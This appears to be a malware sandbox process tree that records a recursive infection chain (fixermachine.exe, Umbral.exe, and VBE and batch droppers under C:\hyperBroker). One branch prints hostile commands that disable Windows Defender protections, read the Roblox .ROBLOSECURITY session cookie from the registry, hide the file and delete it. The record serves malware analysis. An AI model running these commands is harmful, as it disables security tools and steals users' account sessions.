C:\Windows\SysWOW64\cmd.execmd /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "64⤵
- Loads dropped DLL
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"65⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"59⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"60⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"60⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"61⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"62⤵
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "63⤵
- Loads dropped DLL
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"64⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"58⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"59⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"59⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"60⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"61⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "62⤵
- Loads dropped DLL
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"63⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"57⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"58⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"58⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"59⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"60⤵
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "61⤵
- Loads dropped DLL
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"62⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"56⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"57⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid58⤵
-
-
C:\Windows\system32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"58⤵
- Views/modifies file attributes
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'58⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 258⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY58⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY58⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption58⤵
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory58⤵
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid58⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER58⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name58⤵
- Detects videocard installed
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause58⤵
- System Network Configuration Discovery: Internet Connection Discovery
-
C:\Windows\system32\PING.EXEping localhost59⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"57⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"58⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"59⤵
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "60⤵
- Loads dropped DLL
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"61⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"55⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"56⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"56⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"57⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"58⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "59⤵
- Loads dropped DLL
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"60⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"54⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"55⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"55⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"56⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"57⤵
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "58⤵
- Loads dropped DLL
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"59⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"53⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"54⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"54⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"55⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"56⤵
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "57⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"58⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"52⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"53⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"53⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"54⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"55⤵
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "56⤵
- Loads dropped DLL
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"57⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"51⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"52⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"52⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"53⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"54⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "55⤵
- Loads dropped DLL
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"56⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"50⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"51⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"51⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"52⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"53⤵
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "54⤵
- Loads dropped DLL
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"55⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"49⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"50⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"50⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"51⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"52⤵
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "53⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"54⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"48⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"49⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"49⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"50⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"51⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "52⤵
- Loads dropped DLL
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"53⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"47⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"48⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"48⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"49⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"50⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "51⤵
- Loads dropped DLL
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"52⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"46⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"47⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"47⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"48⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"49⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "50⤵
- Loads dropped DLL
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"51⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"45⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"46⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"46⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"47⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"48⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "49⤵
- Loads dropped DLL
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"50⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"44⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"45⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"45⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"46⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"47⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "48⤵
- Loads dropped DLL
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"49⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"43⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"44⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"44⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"45⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"46⤵
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "47⤵
- Loads dropped DLL
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"48⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"42⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"43⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"43⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"44⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"45⤵
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "46⤵
- Loads dropped DLL
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"47⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"41⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"42⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"42⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"43⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"44⤵
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "45⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"46⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"40⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"41⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"41⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"42⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"43⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "44⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"45⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"39⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"40⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"40⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"41⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"42⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "43⤵
- Loads dropped DLL
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"44⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"38⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"39⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"39⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"40⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"41⤵
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "42⤵
- Loads dropped DLL
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"43⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"37⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"38⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"38⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"39⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"40⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "41⤵
- Loads dropped DLL
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"42⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"36⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"37⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"37⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"38⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"39⤵
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "40⤵
- Loads dropped DLL
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"41⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"35⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"36⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"36⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"37⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"38⤵
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "39⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"40⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"34⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"35⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"35⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"36⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"37⤵
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "38⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"39⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"33⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"34⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"34⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"35⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"36⤵
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "37⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"38⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"32⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"33⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"33⤵
-
